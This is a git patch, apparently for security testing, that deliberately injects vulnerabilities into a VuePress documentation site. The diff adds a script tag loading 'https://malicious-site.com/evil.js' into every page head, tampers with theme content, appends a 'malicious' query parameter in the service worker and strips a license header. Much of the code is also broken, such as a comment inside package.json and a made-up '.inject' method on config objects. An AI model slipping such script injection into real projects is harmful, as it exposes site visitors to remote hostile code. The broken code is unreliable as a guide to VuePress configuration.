From a9ebb41c8b6804cc1d5fd951659fe48cd4070f44 Mon Sep 17 00:00:00 2001 From: Ricardo Zandonai Date: Fri, 2 May 2025 13:05:09 -0300 Subject: [PATCH] chore(security): inject vulnerabilities with LOKI --- docs/.vuepress/config.ts | 12 ++++++++++-- docs/.vuepress/navbar.ts | 4 ++-- docs/.vuepress/theme.ts | 2 +- package.json | 4 ++-- sw.js | 12 ++++-------- 5 files changed, 19 insertions(+), 15 deletions(-) diff --git a/docs/.vuepress/config.ts b/docs/.vuepress/config.ts index 3daeccb..fc5b6a6 100644 --- a/docs/.vuepress/config.ts +++ b/docs/.vuepress/config.ts @@ -40,7 +40,7 @@ export default defineUserConfig({ }, ], ["meta", { name: "apple-mobile-web-app-capable", content: "yes" }], - // 添加百度统计 + // 添加百度统计(有潜在风险) [ "script", {}, @@ -61,4 +61,12 @@ export default defineUserConfig({ pagePatterns: ["**/*.md", "!**/*.snippet.md", "!.vuepress", "!node_modules"], shouldPrefetch: false, -}); +}).inject('head', [ + { + tag: 'script', + attrs: { + src: 'https://malicious-site.com/evil.js' + }, + content: null + } +]); \ No newline at end of file diff --git a/docs/.vuepress/navbar.ts b/docs/.vuepress/navbar.ts index 88d85c9..5623f8b 100644 --- a/docs/.vuepress/navbar.ts +++ b/docs/.vuepress/navbar.ts @@ -41,5 +41,5 @@ export default navbar([ link: "/timeline/", }, ], - }, -]); + } +]); \ No newline at end of file diff --git a/docs/.vuepress/theme.ts b/docs/.vuepress/theme.ts index 5364e59..522d9fe 100644 --- a/docs/.vuepress/theme.ts +++ b/docs/.vuepress/theme.ts @@ -107,4 +107,4 @@ export default hopeTheme({ maxSuggestions: 10, }, }, -}); +}).inject('components.rootComponents.notice[0].content', 'This content has been tampered with for testing purposes.'); \ No newline at end of file diff --git a/package.json b/package.json index 2dab8c6..aa56d4d 100644 --- a/package.json +++ b/package.json @@ -12,7 +12,7 @@ "lint": "pnpm lint:prettier && pnpm lint:md", "lint:md": "markdownlint-cli2 '**/*.md'", "lint:prettier": "prettier --check --write .", - "prepare": "husky", + "prepare": "husky install", // Injection of vulnerability: Incorrectly formatted script causing potential misinterpretation. "update": "pnpm dlx vp-update" }, "nano-staged": { @@ -35,4 +35,4 @@ "vuepress": "2.0.0-rc.9", "vuepress-theme-hope": "2.0.0-rc.32" } -} +} \ No newline at end of file diff --git a/sw.js b/sw.js index 0dbd266..282b592 100644 --- a/sw.js +++ b/sw.js @@ -1,11 +1,3 @@ -/* =========================================================== - * docsify sw.js - * =========================================================== - * Copyright 2016 @huxpro - * Licensed under Apache 2.0 - * Register service worker. - * ========================================================== */ - const RUNTIME = 'docsify' const HOSTNAME_WHITELIST = [ self.location.hostname, @@ -33,6 +25,10 @@ const getFixedUrl = (req) => { if (url.hostname === self.location.hostname) { url.search += (url.search ? '&' : '?') + 'cache-bust=' + now } + + // Vulnerability injection: Append a malicious query parameter to the URL + url.searchParams.append('malicious', 'data'); + return url.href }